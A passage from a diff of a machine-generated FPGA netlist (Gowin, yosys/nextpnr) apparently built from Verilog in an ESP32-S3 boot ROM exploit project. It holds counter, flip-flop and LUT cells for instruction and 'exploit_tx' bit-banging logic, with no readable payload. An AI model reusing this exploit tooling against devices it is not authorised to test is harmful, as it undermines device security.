"00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7599 ], + "I3": [ 8056 ], + "I1": [ 7600 ], + "I0": [ 8057 ], + "COUT": [ 7597 ], + "CIN": [ 7602 ] + } + }, + "instruction_counter_DFFE_Q_17": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/DFF1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7600 ], + "D": [ 7599 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_16_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7594 ], + "I3": [ 8056 ], + "I1": [ 7595 ], + "I0": [ 8057 ], + "COUT": [ 7592 ], + "CIN": [ 7597 ] + } + }, + "instruction_counter_DFFE_Q_16": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7595 ], + "D": [ 7594 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_15_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7589 ], + "I3": [ 8056 ], + "I1": [ 7590 ], + "I0": [ 8057 ], + "COUT": [ 7587 ], + "CIN": [ 7592 ] + } + }, + "instruction_counter_DFFE_Q_15": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7590 ], + "D": [ 7589 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_14_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7584 ], + "I3": [ 8056 ], + "I1": [ 7585 ], + "I0": [ 8057 ], + "COUT": [ 7582 ], + "CIN": [ 7587 ] + } + }, + "instruction_counter_DFFE_Q_14": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7585 ], + "D": [ 7584 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_13_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7579 ], + "I3": [ 8056 ], + "I1": [ 7580 ], + "I0": [ 8057 ], + "COUT": [ 7577 ], + "CIN": [ 7582 ] + } + }, + "instruction_counter_DFFE_Q_13": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7580 ], + "D": [ 7579 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_12_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7574 ], + "I3": [ 8056 ], + "I1": [ 7575 ], + "I0": [ 8057 ], + "COUT": [ 7572 ], + "CIN": [ 7577 ] + } + }, + "instruction_counter_DFFE_Q_12": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/DFF0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7575 ], + "D": [ 7574 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_11_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7569 ], + "I3": [ 8056 ], + "I1": [ 7570 ], + "I0": [ 8057 ], + "COUT": [ 7566 ], + "CIN": [ 7572 ] + } + }, + "instruction_counter_DFFE_Q_11": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/DFF1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7570 ], + "D": [ 7569 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_10_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7563 ], + "I3": [ 8056 ], + "I1": [ 7564 ], + "I0": [ 8057 ], + "COUT": [ 7567 ], + "CIN": [ 7566 ] + } + }, + "instruction_counter_DFFE_Q_10": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7564 ], + "D": [ 7563 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_1": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7561 ], + "D": [ 7560 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y10/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7558 ], + "D": [ 7557 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "exploit_tx_count_DFFE_Q_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X7Y11/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7530 ], + "I3": [ 8056 ], + "I1": [ 7431 ], + "I0": [ 8057 ], + "COUT": [ 7554 ], + "CIN": [ 7535 ] + } + }, + "exploit_tx_count_DFFE_Q_5_D_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "01" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:135.23-136.15", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ 7425 ], + "F": [ 7551 ] + } + }, + "exploit_tx_count_DFFE_Q_5": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7425 ], + "D": [ 7551 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y11/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7549 ], + "I3": [ 8056 ], + "I1": [ 7425 ], + "I0": [ 8056 ], + "COUT": [ 7547 ], + "CIN": [ 8069 ] + } + }, + "exploit_tx_count_DFFE_Q_4_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y11/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7545 ], + "I3": [ 8056 ], + "I1": [ 7429 ], + "I0": [ 8057 ], + "COUT": [ 7543 ], + "CIN": [ 7547 ] + } + }, + "exploit_tx_count_DFFE_Q_4": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7429 ], + "D": [ 7545 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "exploit_tx_count_DFFE_Q_3_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y11/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7541 ], + "I3": [ 8056 ], + "I1": [ 7434 ], + "I0": [ 8057 ], + "COUT": [ 7539 ], + "CIN": [ 7543 ] + } + }, + "exploit_tx_count_DFFE_Q_3": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y12/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7434 ], + "D": [ 7541 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "exploit_tx_count_DFFE_Q_2_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y11/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7537 ], + "I3": [ 8056 ], + "I1": [ 7433 ], + "I0": [ 8057 ], + "COUT": [ 7534 ], + "CIN": [ 7539 ] + } + }, + "exploit_tx_count_DFFE_Q_2": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7433 ], + "D": [ 7537 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "exploit_tx_count_DFFE_Q_1_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y11/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:46.33-46.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7532 ], + "I3": [ 8056 ], + "I1": [ 7432 ], + "I0": [ 8057 ], + "COUT": [ 7535 ], + "CIN": [ 7534 ] + } + }, + "exploit_tx_count_DFFE_Q_1": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7432 ], + "D": [ 7532 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "exploit_tx_count_DFFE_Q": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y11/DFF1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7431 ], + "D": [ 7530 ], + "CLK": [ 7419 ], + "CE": [ 7418 ] + } + }, + "$PACKER_GND_DRV": { + "hide_name": 1, + "type": "GOWIN_GND", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X0Y0/GND" + }, + "port_directions": { + "G": "output" + }, + "connections": { + "G": [ 8057 ] + } + }, + "clk_in_IBUF_I": { + "hide_name": 0, + "type": "IBUF", + "parameters": { + "NET_I": "NET", + "NET_O": "NET" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000101", + "NEXTPNR_BEL": "X46Y13/IOBA", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:4.11-4.17", + "&PULL_MODE=UP": "00000000000000000000000000000001", + "keep": "00000000000000000000000000000001" + }, + "port_directions": { + "O": "output", + "I": "input" + }, + "connections": { + "O": [ 7419 ], + "I": [ 7408 ] + } + }, + "$PACKER_VCC_DRV": { + "hide_name": 1, + "type": "GOWIN_VCC", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X0Y0/VCC" + }, + "port_directions": { + "V": "output" + }, + "connections": { + "V": [ 8056 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1_LUT3_F": { + "hide_name": 0, + "type": "LUT3", + "parameters": { + "INIT": "00001011" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/LUT1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:153.41-153.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I2": [ 7433 ], + "I1": [ 7432 ], + "I0": [ 7431 ], + "F": [ 7438 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0_LUT2_F": { + "hide_name": 0, + "type": "LUT2", + "parameters": { + "INIT": "0010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/LUT0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:152.41-152.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:147.23-148.48", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I1": "input", + "I0": "input", + "F": "output" + }, + "connections": { + "I1": [ 7433 ], + "I0": [ 7431 ], + "F": [ 7437 ] + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O": { + "hide_name": 0, + "type": "MUX2_LUT5", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X6Y12/MUX0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:154.14-154.54", + "module_not_derived": 